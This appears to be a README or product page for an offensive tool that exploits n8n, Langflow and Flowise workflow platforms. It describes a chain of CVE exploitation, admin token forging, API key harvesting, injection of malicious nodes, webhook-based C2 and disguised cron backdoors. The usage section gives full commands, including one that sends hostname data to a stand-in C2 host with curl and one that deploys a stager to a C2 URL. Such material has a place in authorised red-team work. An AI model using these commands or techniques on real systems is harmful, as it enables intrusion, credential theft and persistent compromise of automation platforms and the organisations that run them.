SPECTER FLOW is the first offensive security tool targeting AI workflow automation platforms. Three CISA-flagged, actively-exploited CVEs anchor the toolkit: CVE-2026-21858 Ni8mare (CVSS 10.0) enables unauthenticated RCE on n8n via webhook content-type confusion; CVE-2026-33017 (CVSS 9.3) delivers unauthenticated RCE on Langflow exploited within 20 hours of disclosure; CVE-2025-59528 (Max severity) enables unauthenticated JS injection to RCE on 15,000+ exposed Flowise instances. SESSION-FORGE extracts admin tokens from file read primitives. WORKFLOW-POISON injects persistent malicious nodes. WEAPONIZE converts legitimate webhooks into C2 channels — 686% abuse increase documented by Cisco Talos. 249 tests. Zero failures.
CVE-2026-21858 CVSS 10.0 CVE-2026-33017 CVSS 9.3 CVE-2025-59528 Max
Eight subsystems. Full workflow platform exploitation pipeline.
HTTP fingerprinting of n8n, Langflow, and Flowise instances. Platform version detection via endpoint signatures. Unauthenticated endpoint enumeration. CVE applicability mapping. Webhook inventory via /rest/workflows scan.
CVE-2026-21858 "Ni8mare": multipart boundary confusion smuggles path traversal in filename field, triggering arbitrary file read on n8n. CVE-2026-33017: unauthenticated /api/v1/run on Langflow. CVE-2025-34291: /validate/code exec. CVE-2025-59528: Flowise prediction endpoint JS injection.
Stage 2 of CVE-2026-21858: file read retrieves ~/.n8n/config, extracts encryptionKey, forges HMAC-signed admin token. Langflow default superuser credential test. CVE-2025-34291 CORS+CSRF token harvest via /whoami. Flowise unauthenticated /api/v1/apikey harvest.
Systematic extraction of API keys from workflow configurations. Scans /rest/credentials, /rest/workflows, /api/v1/flows/, /api/v1/variables, /api/v1/chatflows. Regex detection for OpenAI, Anthropic, AWS, GitHub, Slack, GitLab, generic secrets, and Bearer tokens.
Injects malicious Execute Command nodes into existing n8n workflows. Appends custom Python components to Langflow flows. Embeds setInterval-triggered execSync nodes in Flowise chatflows. Optional C2 exfil node chained to poison node output.
WEAPONIZE: deploy new n8n workflow with webhook trigger that dynamically serves malware payloads based on User-Agent. Hijack existing webhooks. Flowise prediction endpoint as C2 relay. PERSIST: schedule cron-triggered RCE workflows disguised as "SystemHealthMonitor". Flowise setInterval backdoor node.
| Subsystem | Gate | Function |
|---|---|---|
| SURVEY | OPEN | Platform fingerprinting, endpoint enumeration, CVE applicability, webhook inventory |
| WEBHOOK-RCE | INJECT | CVE-2026-21858 (n8n), CVE-2026-33017 + CVE-2025-34291 (Langflow), CVE-2025-59528 (Flowise) |
| SESSION-FORGE | INJECT | Encryption key extraction, admin token forge, default creds, CSRF token harvest |
| CREDENTIAL-HARVEST | INJECT | API key extraction from workflow configs, credentials store, variables endpoints |
| WORKFLOW-POISON | UNLEASHED | Malicious node injection into existing workflows across all three platforms |
| WEAPONIZE | UNLEASHED | Webhook-based C2 deployment, payload delivery, legitimate-platform relay |
| PERSIST | UNLEASHED | Scheduled backdoor workflows, cron-triggered RCE, setInterval persistence nodes |
| REPORT | OPEN | Ed25519-signed SFL-{hex12} HTML+JSON reports, auto-generated findings |
# Install
pip install -e /path/to/red-specter-specter-flow
# Survey — fingerprint platform and enumerate attack surface
specter-flow survey http://n8n.target.internal:5678
# Exploit CVE-2026-21858 Ni8mare for file read / RCE (INJECT gate)
specter-flow webhook-rce http://n8n.target.internal:5678 \
--platform n8n \
--command "id" \
--override INJECT
# Forge admin session from encrypted config (INJECT gate)
specter-flow session-forge http://n8n.target.internal:5678 \
--platform n8n \
--override INJECT
# Harvest API keys from workflow configurations (INJECT gate)
specter-flow credential-harvest http://n8n.target.internal:5678 \
--platform n8n \
--token <forged-token> \
--override INJECT
# Poison workflows with malicious nodes (UNLEASHED gate)
specter-flow workflow-poison http://n8n.target.internal:5678 \
--platform n8n \
--command "curl http://c2.example.com/$(hostname | base64)" \
--override UNLEASHED \
--confirm-workflow-manipulation \
--roe-file roe.txt
# Deploy C2 webhook channel (UNLEASHED gate)
specter-flow weaponize http://n8n.target.internal:5678 \
--platform n8n \
--payload stager \
--c2 https://c2.callback.example.com \
--override UNLEASHED \
--confirm-workflow-manipulation \
--roe-file roe.txt
# Generate signed SFL report
specter-flow report http://n8n.target.internal:5678 --output /tmp/| CVE | CVSS | Platform | Technique |
|---|---|---|---|
| CVE-2026-21858 "Ni8mare" | 10.0 | n8n | Webhook content-type confusion → arbitrary file read → admin session forge → unauthenticated RCE |
| CVE-2026-21877 | 9.x | n8n | Secondary n8n RCE chain |
| CVE-2026-27493 | 9.x | n8n | n8n RCE chain (CVSS 9.x) |
| CVE-2026-33017 | 9.3 | Langflow | Unauthenticated RCE via /api/v1/run; CISA advisory; exploited <20h post-disclosure |
| CVE-2025-34291 | 9.4 | Langflow | CORS misconfig + missing CSRF + unsafe /validate/code exec → full account takeover |
| CVE-2025-59528 | Max | Flowise | Unauthenticated JS injection → RCE; 15,000+ instances exposed |
| Gate | Flag | Capability |
|---|---|---|
| OPEN | (default) | SURVEY, REPORT — passive fingerprinting and reporting |
| INJECT | --override INJECT | OPEN + WEBHOOK-RCE, SESSION-FORGE, CREDENTIAL-HARVEST |
| UNLEASHED | --override UNLEASHED --confirm-workflow-manipulation --roe-file roe.txt | INJECT + WORKFLOW-POISON, WEAPONIZE, PERSIST — ROE file must contain "workflow manipulation authorised" |
| Source | Finding |
|---|---|
| Horizon3.ai (2026) | CVE-2026-21858 "Ni8mare" — CVSS 10.0 n8n RCE; 100,000+ instances exposed globally |
| CISA Advisory (2026) | CVE-2026-33017 Langflow RCE actively exploited in wild; unpatched instances remain vulnerable |
| Cisco Talos (May 2026) | 686% increase in n8n webhook abuse for malware delivery; legitimate cloud IPs bypass reputation filters |
| BleepingComputer (2025) | CVE-2025-59528 Flowise Max-severity RCE actively exploited; 15,000 instances exposed on internet |
workflow_rce_chain ai_pipeline_credential_exfil webhook_c2_deployment persistent_workflow_backdoor enterprise_automation_destruction
All reports are signed with the operator's Ed25519 private key at ~/.specter_flow/operator.key. Report IDs follow the format SFL-{12 hex chars}. Reports include all subsystem results, CVE evidence, credential findings, and Ed25519 signature. Delivered as both JSON and HTML.